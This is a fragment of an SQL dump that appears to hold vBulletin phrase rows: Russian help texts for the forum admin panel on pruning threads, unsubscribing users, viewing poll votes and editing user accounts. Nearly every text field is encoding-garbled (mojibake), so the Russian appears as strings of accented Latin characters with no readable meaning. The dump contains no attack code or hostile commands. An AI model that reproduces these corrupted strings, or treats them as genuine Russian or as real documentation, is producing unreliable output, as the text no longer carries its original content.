(24142, -1, 'thread_prune_move_viewsleast_text', 'cphelptext', 'Åñëè òåìó ïðîñìîòðåëè áîëüøå ÷åì Õ ðà ç, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãòî ïîëåçÃî äëÿ óäà ëåÃèÿ/ïåðåìåùåÃèÿ ïîïóëÿðÃûõ òåì.', 'vbulletin', '', 0, ''),
(24143, -1, 'thread_prune_move_viewsleast_title', 'cphelptext', 'Òåìà èìååò ÃÃ¥ ìåÃåå X ïðîñìîòðîâ', 'vbulletin', '', 0, ''),
(24144, -1, 'thread_prune_move_viewsmost_text', 'cphelptext', 'Åñëè òåìó ïðîñìîòðåëè ìåÃåå Õ ðà ç, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû çà äà òü ïðîìåæóòîê äëÿ ïðîñìîòðîâ, â êîòîðîì ñëåäóåò óäà ëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''),
(24145, -1, 'thread_prune_move_viewsmost_title', 'cphelptext', 'Òåìà èìååò ÃÃ¥ áîëåå X ïðîñìîòðîâ', 'vbulletin', '', 0, ''),
(24146, -1, 'thread_prune_move_issticky_text', 'cphelptext', 'Âà æÃà ÿ òåìà - òà òåìà , ñòà òóñ êîòîðîé áûë óñòà Ãîâëåà à äìèÃèñòðà òîðîì èëè ìîäåðà òîðîì â ñîñòîÿÃèå \"Âà æÃà ÿ\". Âà æÃûå òåìû îòîáðà æà þòñÿ Ãà âåðõó ñïèñêà òåì ðà çäåëà ÃÃ¥ çà âèñèìî îò äà òû ïîñëåäÃåãî ñîîáùåÃèÿ â Ãåé. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ äëÿ âûáîðêè âà æÃûõ èëè ÃÃ¥ âà æÃûõ òåì, ëèáî òåõ è äðóãèõ.', 'vbulletin', '', 0, ''),
(24147, -1, 'thread_prune_move_issticky_title', 'cphelptext', 'Òåìà âà æÃà ÿ', 'vbulletin', '', 0, ''),
(24148, -1, 'thread_prune_move_state_text', 'cphelptext', 'ÃðîâåðåÃà : \r\nÃðîâåðåÃÃà ÿ òåìà - òà , êîòîðà ÿ ÃÃ¥ îæèäà åò ïîäòâåðæäåÃèÿ à äìèÃèñòðà òîðà èëè ìîäåðà òîðà . Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ, ÷òîáû âûáðà òü òîëüêî ïðîâåðåÃÃûå òåìû, ÃÃ¥ ïðîâåðåÃÃûå, ëèáî òå è äðóãèå. \r\n\r\nÃÃ¥ ïðîâåðåÃà : \r\nÒåìà îæèäà åò ïðîâåðêè, åñëè îÃà äîëæÃà áûòü ïîäòâåðæäåÃà à äìèÃèñòðà òîðîì èëè ìîäåðà òîðîì äî òîãî, êà ê îÃà áóäåò îòîáðà æà òüñÿ â ñïèñêå òåì. \r\n\r\nÓäà ëåÃà : \r\nÊîãäà à äìèÃèñòðà òîð èëè ìîäåðà òîð óäà ëÿåò òåìó, îà ìîæåò âûáðà òü \"ìÿãêîå\" èëè \"ïîëÃîå\" óäà ëåÃèå. \"Ìÿãêîå\" óäà ëåÃèå ïðîñòî óáåð¸ò òåìó îò ïóáëè÷Ãîãî ïðîñìîòðà è îñòà âèò Ãà ýòîì ìåñòå \"óâåäîìëåÃèå îá óäà ëåÃèè\". Ãòà îïöèÿ ññûëà åòñÿ Ãà \"ìÿãêîå\" óäà ëåÃèå, êîãäà òåìû âñ¸ åù¸ ñóùåñòâóþò è ìîãóò áûòü âîññòà ÃîâëåÃû. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ äëÿ âûáîðêè òîëüêî \"ìÿãêî\" óäà ë¸ÃÃûõ òåì, ÃÃ¥ óäà ë¸ÃÃûõ òåì, à òà êæå òåõ è äðóãèõ.', 'vbulletin', '', 0, ''),
(24149, -1, 'thread_prune_move_state_title', 'cphelptext', 'ÑîñòîÿÃèå òåìû', 'vbulletin', '', 0, ''),
(24150, -1, 'thread_prune_move_status_text', 'cphelptext', 'Îòêðûòà : \r\nÎòêðûòà ÿ òåìà - òà , â êîòîðîé ìîãóò ïèñà òü ïîëüçîâà òåëè. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ äëÿ âûáîðà òîëüêî îòêðûòûõ òåì. \r\n\r\nÇà êðûòà : \r\nÇà êðûòà ÿ òåìà - òåìà , êîòîðóþ çà êðûë à äìèÃèñòðà òîð, ìîäåðà òîð èëè äðóãîé ïîëüçîâà òåëü, ñ ñîîòâåòñòâóþùèìè ïðà âà ìè. Ãîëüçîâà òåëè ÃÃ¥ ìîãóò îòâå÷à òü â çà êðûòûõ òåìà õ. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ äëÿ âûáîðà òîëüêî çà êðûòûõ òåì. \r\n\r\nÃåðåìåùåÃèå : \r\nÊîãäà à äìèÃèñòðà òîð èëè ìîäåðà òîð ïåðåìåùà åò òåìó â äðóãîé ðà çäåë, îà ìîæåò îòñòà âèòü â äà ÃÃîì ðà çäåëå ññûëêó, ïåðåìåùà þùóþ Ãà Ãîâîå ìåñòîïîëîæåÃèå òåìû. Ãòî Ãà çûâà åòñÿ ïåðåìåùåÃèåì. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ, ÷òîáû âûáðà òü òîëüêî òåìû-ïåðåìåùåÃèÿ. \r\n\r\nÃÃ¥ ïåðåìåùåÃèå : \r\nÑìîòðèòå âûøå.', 'vbulletin', '', 0, ''),
(24151, -1, 'thread_prune_move_status_title', 'cphelptext', 'Ñòà òóñ òåìû', 'vbulletin', '', 0, ''),
(24152, -1, 'thread_prune_move_posteduser_text', 'cphelptext', 'Åñëè òåìà ñîçäà Ãà óêà çà ÃÃûì ïîëüçîâà òåëåì, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãòî ïîëåçÃî äëÿ áîðüáû ñ ïîëüçîâà òåëÿìè, ñîçäà þùèìè ìÃîãî òåì ñî ñïà ìîì.', 'vbulletin', '', 0, ''),
(24153, -1, 'thread_prune_move_posteduser_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''),
(24154, -1, 'thread_prune_move_titlecontains_text', 'cphelptext', 'Åñëè Ãà çâà Ãèå òåìû ñîäåðæèò ýòó ñòðî÷êó, òî îÃà áóäåò óäà ëåÃà /ïåðåìåùåÃà . Ãåãèñòð ÃÃ¥ âëèÿåò.', 'vbulletin', '', 0, ''),
(24155, -1, 'thread_prune_move_titlecontains_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(24156, -1, 'thread_prune_move_forumid_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, èç êîòîðîãî âû æåëà åòå óäà ëèòü/ïåðåìåñòèòü òåìû. ×òîáû áûòü äîñòóïÃûìè äëÿ âûáîðà , òåìû äîëæÃû áûòü â ýòîì ðà çäåëå. Âûáåðèòå \"Âñå ðà çäåëû\", ÷òîáû âûáèðà òü òåìû Ãåçà âèñèìî îò ðà çäåëà .', 'vbulletin', 'zCarot', 1205941360, '3.7.0 Release Candidate 1'),
(24157, -1, 'thread_prune_move_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', '', 0, ''),
(24158, -1, 'thread_prune_move_subforums_text', 'cphelptext', 'Åñëè âû æåëà åòå âêëþ÷à òü ïîäðà çäåëû ðà çäåëîâ, òî âêëþ÷èòå ýòó îïöèþ. Ãà ïðèìåð, åñëè Ãà çäåë2 - ïîäðà çäåë ðà çäåëà Ãà çäåë1 è ïðè ïîèñêå âûáåðåòñÿ Ãà çäåë1, òî Ãà çäåë2 òîæå áóäåò âêëþ÷¸à â ïîèñê, åñëè ýòà îïöèÿ âêëþ÷åÃà .', 'vbulletin', '', 0, ''),
(24159, -1, 'thread_prune_move_subforums_title', 'cphelptext', 'Âêëþ÷à òü ïîäðà çäåëû', 'vbulletin', '', 0, ''),
(24160, -1, 'thread_prune_move_prefixid_text', 'cphelptext', 'Âûáåðèòå ïðåôèêñ, êîòîðûé äîëæÃû èìåòü òåìû. Âûáåðèòå \"(áåç ïðåôèêñà )\", ÷òîáû èñêà òü òîëüêî òåìû, êîòîðûå ÃÃ¥ èìåþò ïðåôèêñà .', 'vbulletin', 'zCarot', 1190110079, '3.7.0 Beta 1'),
(24161, -1, 'thread_prune_move_prefixid_title', 'cphelptext', 'Ãðåôèêñ', 'vbulletin', 'zCarot', 1190110079, '3.7.0 Beta 1'),
(24162, -1, 'thread_pruneusersel_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê âñåõ ñîîòâåòñòâóþùèõ òåì è ñîîáùåÃèé. Îòìåòüòå òåìû è ñîîáùåÃèÿ, êîòîðûå æåëà åòå óäà ëèòü. Ãà æìèòå Ãà êÃîïêó \"Ok\" äëÿ ïðîäîëæåÃèÿ. Âû ìîæåòå ïðîñìîòðåòü òåìó èëè ñîîáùåÃèå â Ãîâîì îêÃÃ¥, Ãà æà â Ãà èõ Ãà çâà Ãèå èëè çà ãîëîâîê.', 'vbulletin', '', 0, ''),
(24163, -1, 'thread_pruneusersel_title', 'cphelptext', 'Âûáîðî÷Ãîå óäà ëåÃèå òåì è ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24164, -1, 'thread_removepoll_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîäòâåðäèòü ñâî¸ æåëà Ãèå óäà ëèòü âûáðà ÃÃûé îïðîñ. Óáåäèòåñü, ÷òî èÃôîðìà öèÿ Ãèæå ïðà âèëüÃà . Ãà æìèòå Ãà êÃîïêó \"Óäà ëèòü\", åñëè âñ¸ âåðÃî.', 'vbulletin', '', 0, ''),
(24165, -1, 'thread_removepoll_title', 'cphelptext', 'Óäà ëèòü îïðîñ', 'vbulletin', '', 0, ''),
(24166, -1, 'thread_tagmerge_tagtext_text', 'cphelptext', 'Ââåä¸ÃÃà ÿ ìåòêà áóäåò îáúåäèÃÿòü âñå âûáðà ÃÃûå ìåòêè. Åñëè Ãîâà ÿ ìåòêà åù¸ ÃÃ¥ ñóùåñòâóåò, òî îÃà áóäåò ñîçäà Ãà . Ãîâà ÿ ìåòêà ìîæåò áûòü îäÃîé èç âûáðà ÃÃûõ. Åñëè âû âûáðà ëè âñåãî îäÃó ìåòêó è Ãîâà ÿ ìåòêà ÃÃ¥ ñóùåñòâóåò, òî, ôà êòè÷åñêè, âû ïåðåèìåÃóåòå ìåòêó.', 'vbulletin', 'zCarot', 1216743771, '3.8.0 Alpha 1'),
(24167, -1, 'thread_tagmerge_tagtext_title', 'cphelptext', 'ÎáúåäèÃèòü ìåòêè', 'vbulletin', 'zCarot', 1216743741, '3.8.0 Alpha 1'),
(24168, -1, 'thread_tags_tagtext_text', 'cphelptext', 'Ñèñòåìà ìåòîê äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì äîáà âëÿòü ñâîè êëþ÷åâûå ñëîâà (ìåòêè) ê òåìà ì. Âû ìîæåòå óçÃà òü áîëüøå èÃôîðìà öèè î ìåòêà õ â à Ããëîÿçû÷Ãîé ÷à ñòè Wikipedia . \r\n \r\nÇäåñü âû ìîæåòå óïðà âëÿòü ñóùåñòâóþùèìè ìåòêà ìè è ñîçäà âà òü Ãîâûå. ÃîìÃèòå, ÷òî âû ÃÃ¥ ìîæåòå ñîçäà òü òà êèå ìåòêè, êîòîðûå ÃÃ¥ áóäóò äîñòóïÃû äëÿ ïîëüçîâà òåëåé. Ãòî òà êæå îçÃà ÷à åò, ÷òî âû ÃÃ¥ ìîæåòå îáîéòè ïà ðà ìåòð ìà êñèìà ëüÃîãî ðà çìåðà äëÿ ìåòêè, è èñïîëüçîâà òü â ìåòêå ñëîâî, ïîäâåðãÃóòîå öåÃçóðå Ãà âà øåì ôîðóìå.', 'vbulletin', 'zCarot', 1191253897, '3.7.0 Beta 1'),
(24169, -1, 'thread_tags_tagtext_title', 'cphelptext', 'Ñïèñîê ìåòîê', 'vbulletin', 'zCarot', 1191253897, '3.7.0 Beta 1'),
(24170, -1, 'thread_unsubscribe_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå îòïèñà òü âñåõ ïîëüçîâà òåëåé îò óêà çà ÃÃîé òåìû èëè óäà ëèòü âñå ïîäïèñêè äëÿ óêà çà ÃÃîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24171, -1, 'thread_unsubscribe_title', 'cphelptext', 'Îòïèñêà îò òåì', 'vbulletin', '', 0, ''),
(24172, -1, 'thread_unsubscribe_ids_text', 'cphelptext', 'Âñå ïîëüçîâà òåëè, êîòîðûå ïîäïèñà Ãû Ãà ýòè òåìû áóäóò îòïèñà Ãû îò Ãèõ. Âû ìîæåòå óçÃà òü ID ÃóæÃîé òåìû, âçãëÿÃóâ Ãà å¸ à äðåñ. Ãà ïðèìåð, òåìà ñ URL http://www.example.com/forum/showthread.php?t=2 èìååò ID òåìû 2.', 'vbulletin', '', 0, ''),
(24173, -1, 'thread_unsubscribe_ids_title', 'cphelptext', 'Ââåäèòå ID òåì(û)', 'vbulletin', '', 0, ''),
(24174, -1, 'thread_unsubscribe_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ, ÷üè ïîäïèñêè æåëà åòå óäà ëèòü. Ãòîò ïîëüçîâà òåëü áóäåò îòïèñà à îò âñåõ òåì, Ãà êîòîðûå îà áûë ïîäïèñà Ã. Ãðîïóñòèòå ýòîò ïóÃêò, ÷òîáû îòïèñà òü âñåõ ïîëüçîâà òåëåé îò âñåõ òåì, ñîîòâåòñòâóþùèì êðèòåðèÿì Ãèæå.', 'vbulletin', '', 0, ''),
(24175, -1, 'thread_unsubscribe_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''),
(24176, -1, 'thread_unsubscribe_daysprune_text', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå â òåìå äîëæÃî áûòü ðà çìåùåÃî ÃÃ¥ ìåÃåå, ÷åì X äÃåé Ãà çà ä, ÷òîáû îòïèñà òü îò Ãå¸ ïîëüçîâà òåëåé. Ãòî ïîëåçÃî äëÿ óäà ëåÃèÿ ïîäïèñîê Ãà òåìû, êîòîðûå óñòà ðåëè è äà âÃî ÃÃ¥ îáñóæäà þòñÿ.', 'vbulletin', 'Vovan', 0, ''),
(24177, -1, 'thread_unsubscribe_daysprune_title', 'cphelptext', 'Ãà éòè âñå òåìû ñòà ðøå X äÃåé', 'vbulletin', '', 0, ''),
(24178, -1, 'thread_unsubscribe_forumid_text', 'cphelptext', 'Òåìà äîëæÃà áûòü â ýòîì ðà çäåëå, ÷òîáû îòïèñà òü îò Ãå¸ ïîëüçîâà òåëÿ. Âûáåðèòå \"Âñå ðà çäåëû\", ÷òîáû îòïèñûâà òü ýòîãî ïîëüçîâà òåëÿ îò òåì ÃÃ¥ çà âèñèìî îò òîãî, â êà êîì îÃà ðà çäåëå.', 'vbulletin', 'zCarot', 1205941374, '3.7.0 Release Candidate 1'),
(24179, -1, 'thread_unsubscribe_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', '', 0, ''),
(24180, -1, 'thread_votes_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óâèäåòü, êà êèå ïîëüçîâà òåëè çà ÷òî ãîëîñîâà ëè â ëþáîì îïðîñå âà øåãî ôîðóìà . Âûáåðèòå îïðîñ èç ìåÃþ Ãèæå è Ãà æìèòå êÃîïêó \"Êòî ãîëîñîâà ë\", ÷òîáû óâèäåòü ðà ñïðåäåëåÃèå ãîëîñîâ.', 'vbulletin', '', 0, ''),
(24181, -1, 'thread_votes_title', 'cphelptext', 'Êòî ãîëîñîâà ë', 'vbulletin', '', 0, ''),
(24182, -1, 'thread_votes_pollid_text', 'cphelptext', 'Âûáåðèòå â ýòîì ìåÃþ îïðîñ. Îïðîñû îòñîðòèðîâà Ãû ïî ID îïðîñà , òî åñòü ïî äà òå ðà çìåùåÃèÿ. Ãîëåå ñòà ðûå îïðîñû èìåþò ìà ëåÃüêèé ID, Ãîâûå - áîëüøîé.', 'vbulletin', '', 0, ''),
(24183, -1, 'thread_votes_pollid_title', 'cphelptext', 'Ãîëîñîâà Ãèå', 'vbulletin', '', 0, ''),
(24184, -1, 'thread_votes_threadtitle_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå òåìû, ê êîòîðîé ïðèÃà äëåæèò âûáðà ÃÃûé âûøå îïðîñ. Ãà çâà Ãèå çäåñü äëÿ òîãî, ÷òîáû âû óëîâèëè ñâÿçü ìåæäó çà ãîëîâêîì îïðîñà è Ãà çâà Ãèåì òåìû.', 'vbulletin', '', 0, ''),
(24185, -1, 'thread_votes_threadtitle_title', 'cphelptext', 'Òåìà ', 'vbulletin', '', 0, ''),
(24186, -1, 'user_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîëüçîâà òåëè \r\nÓïðà âëåÃèå ïîëüçîâà òåëÿìè \r\nÃëîêèðîâêà ïîëüçîâà òåëÿ \r\nÃà ññûëêà ýëåêòðîÃÃûõ ïèñåì \r\nÌà ñêè äîñòóïà \r\nÃîëüçîâà òåëè: \r\nÑèñòåìà ïîëüçîâà òåëåé ñîñòîèò èç Ãåñêîëüêèõ ÷à ñòåé, ïîýòîìó óáåäèòåñü, ÷òî âû îçÃà êîìèëèñü ñ ïðåäëîæåÃÃûìè âûøå ñòà òüÿìè.  ðà çäåëå \"Ãîëüçîâà òåëè\" ïà Ãåëè à äìèÃèñòðà òîðà âû èìååòå âîçìîæÃîñòü äîáà âëÿòü Ãîâûõ ïîëüçîâà òåëåé, èñêà òü ñóùåñòâóþùèõ ïî ðà çëè÷Ãûì ïà ðà ìåòðà ì, óäà ëÿòü ïîëüçîâà òåëåé è ïðîèçâîäèòü äðóãèå îïåðà öèè, êîòîðûå îïèñà Ãû â òåìà õ ñïðà âêè \"Óïðà âëåÃèå ïîëüçîâà òåëÿìè\", \"Ãëîêèðîâêà ïîëüçîâà òåëÿ\", \"Ãà ññûëêà ýëåêòðîÃÃûõ ïèñåì\" è \"Ìà ñêè äîñòóïà \". \r\nÄîáà âëåÃèå Ãîâîãî ïîëüçîâà òåëÿ ÷åðåç ïà Ãåëü à äìèÃèñòðà òîðà - òîæå ñà ìîå, ÷òî è îáû÷Ãà ÿ ðåãèñòðà öèÿ, Ãî â ïà Ãåëè à äìèÃèñòðà òîðà ðåãèñòðà öèÿ ÃÃ¥ òðåáóåò çà ïîëÃÃ¥Ãèÿ âñåõ ïîëåé è ñîãëà ñèÿ ñ òðåáîâà Ãèÿìè, óêà çà ÃÃûìè â ðåãèñòðà öèîÃÃîé ôîðìå. Ãà ïðèìåð, âû ìîæåòå ñîçäà òü ïîëüçîâà òåëÿ áåç óêà çà Ãèÿ à äðåñà ýëåêòðîÃÃîé ïî÷òû. ×òîáû ýòî ñäåëà òü, çà éäèòå Ãà ñòðà Ãèöó Äîáà âèòü ïîëüçîâà òåëÿ . \r\nÃîèñê ïîëüçîâà òåëåé îáåñïå÷èâà åò âîçìîæÃîñòü ïîèñêà ïî ìÃîãî÷èñëåÃÃûì ïà ðà ìåòðà ì, à òà êæå ðà çëè÷Ãûå âà ðèà Ãòû îòîáðà æåÃèÿ ðåçóëüòà òîâ. Âû ìîæåòå èñïîëüçîâà òü ýòó ôóÃêöèþ äëÿ ïîèñêà è ðåäà êòèðîâà Ãèÿ ïîëüçîâà òåëåé è äëÿ ïîëó÷åÃèÿ èÃôîðìà öèè î ïîëüçîâà òåëå è åãî ïðîôèëå. Ñì. ñòðà Ãèöó Ãîèñê ïîëüçîâà òåëåé . \r\nÑèñòåìà ïîëüçîâà òåëåé òà êæå ïîçâîëÿåò ìà ññîâî óäà ëÿòü/ïåðåìåùà òü ïîëüçîâà òåëåé, îòîáðà â èõ ïî ãðóïïå, äà òå ïîñëåäÃåãî âèçèòà , äà òå ðåãèñòðà öèè è êîëè÷åñòâó ñîîáùåÃèé. Ãà ïðèìåð, îòñþäà ìîæÃî ìà ññîâî óäà ëÿòü Ãåà êòèâÃûõ ïîëüçîâà òåëåé è èçìåÃÿòü ãðóïïó äëÿ óïðà âëåÃèÿ ïðà âà ìè äîñòóïà . Ñòðà Ãèöà óäà ëåÃèÿ/ïåðåìåùåÃèÿ ïîëüçîâà òåëåé Ãà õîäèòñÿ çäåñü .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24187, -1, 'user_title', 'cphelptext', 'Î ïîëüçîâà òåëÿõ', 'vbulletin', '', 0, ''),
(24188, -1, 'user_add_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ìîæåò áûòü èñïîëüçîâà Ãà äëÿ òîãî, ÷òîáû äîáà âèòü Ãîâîãî ïîëüçîâà òåëÿ Ãà âà ø ôîðóì.', 'vbulletin', '', 0, ''),
(24189, -1, 'user_add_title', 'cphelptext', 'Äîáà âëåÃèå ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24190, -1, 'user_add_password_text', 'cphelptext', 'Ââåäèòå ïà ðîëü ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24191, -1, 'user_add_password_title', 'cphelptext', 'Ãà ðîëü', 'vbulletin', '', 0, ''),
(24192, -1, 'user_add_edit_adminavatar_text', 'cphelptext', 'Ãòà îïöèÿ ðà çðåøà åò ïîëüçîâà òåëþ îñòà âèòü Ãåñòà Ãäà ðòÃûé à âà òà ð, åñëè îà ïîòåðÿåò ïðà âî èìåòü åãî ïðè èçìåÃÃ¥Ãèè ãðóïïû ïîëüçîâà òåëåé.\r\n\r\nÅñëè ïîëüçîâà òåëü áóäåò ïåðåìåù¸à â ãðóïïó ïîëüçîâà òåëåé, ÃÃ¥ èìåþùóþ ïðà âà èñïîëüçîâà òü Ãåñòà Ãäà ðòÃûé à âà òà ð, òî à âà òà ð ïîëüçîâà òåëÿ âñ¸ åù¸ áóäåò âèäåà â ñîîáùåÃèÿõ, â ïðîôèëå è â ñïèñêå ïîëüçîâà òåëåé, åñëè ýòà îïöèÿ âêëþ÷åÃà .\r\n\r\nÃòà îïöèÿ ÃÃ¥ ðà çðåøà åò ïîëüçîâà òåëÿì èçìåÃÿòü ñâîé à âà òà ð. ×òîáû ñäåëà òü ýòî, ÃóæÃî èìåòü ñîîòâåòñòâóþùèå ïðà âà .\r\n\r\nÅñëè à äìèÃèñòðà òîð èçìåÃÿåò èëè ïðèñâà èâà åò ïîëüçîâà òåëþ Ãåñòà Ãäà ðòÃûé à âà òà ð, è åñëè ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ äà ¸ò åìó ïðà âî èìåòü Ãåñòà Ãäà ðòÃûé à âà òà ð, òî äà ÃÃà ÿ îïöèÿ áóäåò à âòîìà òè÷åñêè âêëþ÷åÃà .', 'vbulletin', 'zCarot', 1144687826, '3.6.0 Beta 1'),
(24193, -1, 'user_add_edit_adminavatar_title', 'cphelptext', 'Ñîõðà Ãèòü Ãåñòà Ãäà ðòÃûé à âà òà ð', 'vbulletin', 'zCarot', 1144687826, '3.6.0 Beta 1'),
(24194, -1, 'user_add_edit_adminprofilepic_text', 'cphelptext', 'Ãòà îïöèÿ ðà çðåøà åò ïîëüçîâà òåëþ îñòà âèòü ôîòîãðà ôèþ, åñëè îà ïîòåðÿåò ïðà âî èìåòü å¸ ïðè èçìåÃÃ¥Ãèè ãðóïïû ïîëüçîâà òåëåé.\r\n\r\nÅñëè ïîëüçîâà òåëü áóäåò ïåðåìåù¸à â ãðóïïó ïîëüçîâà òåëåé, ÃÃ¥ èìåþùóþ ïðà âà èñïîëüçîâà òü ôîòîãðà ôèþ, òî ôîòîãðà ôèÿ ïîëüçîâà òåëÿ âñ¸ åù¸ áóäåò âèäÃà â ïðîôèëå è â ñïèñêå ïîëüçîâà òåëåé, åñëè ýòà îïöèÿ âêëþ÷åÃà .\r\n\r\nÃòà îïöèÿ ÃÃ¥ ðà çðåøà åò ïîëüçîâà òåëÿì èçìåÃÿòü ñâîþ ôîòîãðà ôèþ. ×òîáû ñäåëà òü ýòî, ÃóæÃî èìåòü ñîîòâåòñòâóþùèå ïðà âà .\r\n\r\nÅñëè à äìèÃèñòðà òîð èçìåÃÿåò èëè ïðèñâà èâà åò ïîëüçîâà òåëþ ôîòîãðà ôèþ, è åñëè ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ äà ¸ò åìó ïðà âî èìåòü ôîòîãðà ôèþ, òî äà ÃÃà ÿ îïöèÿ áóäåò à âòîìà òè÷åñêè âêëþ÷åÃà .', 'vbulletin', 'zCarot', 1144687906, '3.6.0 Beta 1'),
(24195, -1, 'user_add_edit_adminprofilepic_title', 'cphelptext', 'Ñîõðà Ãèòü ôîòîãðà ôèþ', 'vbulletin', 'zCarot', 1144687906, '3.6.0 Beta 1'),
(24196, -1, 'user_add_edit_ipoints_text', 'cphelptext', 'Êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé, êîòîðûå èìååò ïîëüçîâà òåëü. ×òîáû îáÃóëèòü óäà ëèòå çÃà ÷åÃèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284165, '3.7.0 Beta 4'),
(24197, -1, 'user_add_edit_ipoints_title', 'cphelptext', 'Ãà ëëû Ãà ðóøåÃèé', 'vbulletin', 'zCarot', 1199284165, '3.7.0 Beta 4'),
(24198, -1, 'user_add_edit_vm_enable_text', 'cphelptext', 'Åñëè \"Ãåò\", òî îòïðà âêà ïóáëè÷Ãûõ ñîîáùåÃèé ýòîìó ïîëüçîâà òåëþ áóäåò ÃåâîçìîæÃà .', 'vbulletin', 'zCarot', 1207920354, '3.7.0 Release Candidate 4'),
(24199, -1, 'user_add_edit_vm_enable_title', 'cphelptext', 'Âêëþ÷èòü ïóáëè÷Ãûå ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1207920279, '3.7.0 Release Candidate 4'),
(24200, -1, 'user_add_edit_warnings_text', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåÃèé, êîòîðûå èìååò ïîëüçîâà òåëü. ×òîáû îáÃóëèòü óäà ëèòå çÃà ÷åÃèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284220, '3.7.0 Beta 4'),
(24201, -1, 'user_add_edit_warnings_title', 'cphelptext', 'ÃðåäóïðåæäåÃèÿ', 'vbulletin', 'zCarot', 1199284076, '3.7.0 Beta 4'),
(24202, -1, 'user_add_edit_infractions_text', 'cphelptext', 'Êîëè÷åñòâî Ãà ðóøåÃèé, êîòîðûå èìååò ïîëüçîâà òåëü. ×òîáû îáÃóëèòü óäà ëèòå çÃà ÷åÃèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284187, '3.7.0 Beta 4'),
(24203, -1, 'user_add_edit_infractions_title', 'cphelptext', 'Ãà ðóøåÃèÿ', 'vbulletin', 'zCarot', 1199284133, '3.7.0 Beta 4'),
(24204, -1, 'user_add_edit_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ. Èìÿ ïîëüçîâà òåëÿ èñïîëüçóåòñÿ ïðè âõîäå Ãà ôîðóì è îòîáðà æà åòñÿ â ñîîáùåÃèÿõ ïîëüçîâà òåëÿ. \r\nÅñëè âû ðåäà êòèðóåòå èìÿ ñóùåñòâóþùåãî ïîëüçîâà òåëÿ, òî ïîñëå ðåäà êòèðîâà Ãèÿ âû äîëæÃû îáÃîâèòü âà øè ñ÷¸ò÷èêè .', 'vbulletin', '', 0, ''),
(24205, -1, 'user_add_edit_username_title', 'cphelptext', 'Èìÿ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24206, -1, 'user_add_edit_email_text', 'cphelptext', 'Ââåäèòå à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëÿ, êîòîðûé áóäåò èñïîëüçîâà òüñÿ äëÿ êîÃòà êòà ñ Ãèì ÷åðåç ôîðóì.', 'vbulletin', '', 0, ''),
(24207, -1, 'user_add_edit_email_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(24208, -1, 'user_add_edit_languageid_text', 'cphelptext', 'Âûáåðèòå ÿçûê, êîòîðûé èñïîëüçóåòñÿ ïîëüçîâà òåëåì Ãà ôîðóìå.', 'vbulletin', '', 0, ''),
(24209, -1, 'user_add_edit_languageid_title', 'cphelptext', 'ßçûê', 'vbulletin', '', 0, ''),
(24210, -1, 'user_add_edit_usertitle_text', 'cphelptext', 'Ââåäèòå ñòà òóñ ïîëüçîâà òåëÿ. Ñòà òóñ îòîáðà æà åòñÿ ðÿäîì ñ èìåÃåì ïîëüçîâà òåëÿ â ðà çìåùà åìûõ èì ñîîáùåÃèÿõ. Åñëè âû ïðèñâà èâà åòå ïîëüçîâà òåëþ îñîáûé ñòà òóñ, ÃÃ¥ çà áóäüòå óñòà Ãîâèòü Ãà \"Äà \" ñëåäóþùóþ îïöèþ (\"Îñîáûé ñòà òóñ\").', 'vbulletin', '', 0, ''),
(24211, -1, 'user_add_edit_usertitle_title', 'cphelptext', 'Ñòà òóñ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
